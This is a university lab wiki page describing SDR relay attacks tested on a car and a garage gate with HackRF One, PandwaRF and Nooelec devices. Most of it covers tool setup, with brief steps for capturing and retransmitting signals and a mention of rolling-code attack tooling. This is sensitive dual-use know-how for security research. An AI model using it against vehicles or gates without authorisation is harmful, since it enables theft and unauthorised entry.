SDR-RelayAttacks

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search

Summary

This documentation is about SDR (Software defined radio) and relay attacks. This document will give you a better understanding of these definitions and how some devices in IOT can/could be attacked with SDR relay attacks. This documentations will also provides detailed information about devices we used, the setup of these devices and other requirements.

Requirements

We used 3 different devices for the penetration-testing of a car and a gate.

Hardware

  • HackRF-One
  • PandwaRF
  • Nooelec SDR (No transmission possible)
  • Car
  • Garage gate

Software

  • Computer with native Kali-Linux installed.
  • License for PandwaRF.
  • Universal Radio Hacker.
  • PandwaRF App for Android. (Must be a device with latest Android version installed)

In order to complete these steps, you must have followed Some Other Documentation before.

Description

Pentesting with PandwaRF

Step 1

  1. Install the application on your Android Phone.
  2. Open the Device.
  3. Install the antennas. (Never use a SDR Device without antennas.)
  4. Connect the PandwaRF via USB-C to your phone.
  5. Open the application.


Step 2

  1. The device should have connected with your application. If not, do it manually in the search tab.
  2. After the device has connected, you can use the spectrum analyser to analyse the frequency which the device captures. If you want to get your desired signal, you need to choose your frequency.
  3. At the Rx/Tx tab you can scan you signal which you try to capture. It is even possible to auto detect a signal which is sent.The pandwaRF will give you the captured signal in hex or in Binary which you can afterwards analyze.
  4. In order to transmit a captured signal, you need to buy a "Kaiju License. Kaiju is an online tool where you can analyze rolling code and generate those. Kaiju is mainly used to attack systems which use rolling code.

Pentesting with HackRF one

Step 1

  1. Set up a laptop with native kali linux
    1. If you want dual boot on your local machine use these instructions

Dualboot on windows machine

  1. You need a USB stick with a minimum of 8gb storage
  1. Download Kali image from official website
  1. Download e.g. Etcher to flash the image on the USB stick to make it bootable
  1. On the computer enter BIOS and change the BIOS-Mode to Legacy instead of Secure Boot (if secure boot is enabled). Secure boot prevents booting from external device! Then change the BIOS-Priority to “USB” first.
  1. For further information follow the instructions on the official website

Step 2

  • Driver Installation on HackRF One
  1. Download Zadig
  2. Only compatible with Windows
  • Set-up HackRF on Linux
  1. Sudo apt-get update
  2. Sudo apt-get -y install hackrf

Download Universal Radio Hacker on Linux machine

  • First method
  1. Sudo python3 -m pip install –upgrade pip
  2. Sudo python3 -m pip install urh
  • Second method
  1. Sudo apt -y install urh

  • Third method
  1. git clone https://github.com/jopohl/urh
  2. cd urh
  3. python setup.py install
  • Start Universal Radio Hacker with the command “urh”
    • The device settings are listed below:
    1. Choose HackRF
    2. Enter the frequency

Nesdr Smart – receive only

Step 1

Install the driver with zadig (detailed information in the HackRF One section)

Step 2

Enter the RTL-SDR the “Device” option of the device settings and the frequency and you are ready to receive signals!

Used Hardware

  • HackRF One
  • PandwaRF
  • Nooelec SDR

Conclusion

We were able to receive signals with all three Software defined radios. However, HackRF One was the only device which allowed us to transmit signals too. It should be possible to transmit signal with PandwaRF as well, but we struggled with the Kaiju license, which is necessary for the transmission process. Therefore, we were able to achieve our project goals with the HackRF One.

References